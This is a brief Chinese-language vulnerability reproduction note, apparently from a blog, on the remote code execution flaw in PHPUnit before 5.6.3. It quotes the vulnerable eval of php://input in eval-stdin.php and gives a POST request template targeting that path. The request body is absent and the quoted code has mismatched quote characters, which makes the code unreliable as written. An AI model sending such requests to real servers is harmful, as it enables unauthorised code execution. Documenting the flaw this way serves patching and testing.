# PHPUnit eval-stdin.php 远程命令执行漏洞
## 漏洞描述
PHPUnit5.6.3之前的版本,存在一处远程代码执行漏洞,利用漏洞可以获取服务器敏感信息及权限。
## 漏洞影响
PHPUnit < 5.6.3
## 漏洞复现
漏洞位于 /phpunit/src/Util/PHP/eval-stdin.php
其中关键代码为:
```
eval('?>‘.file_get_contents(‘php://input’));
“`
发送如下请求包执行PHP代码
“`
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host:
Content-Length: 21
Accept-Encoding: gzip
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容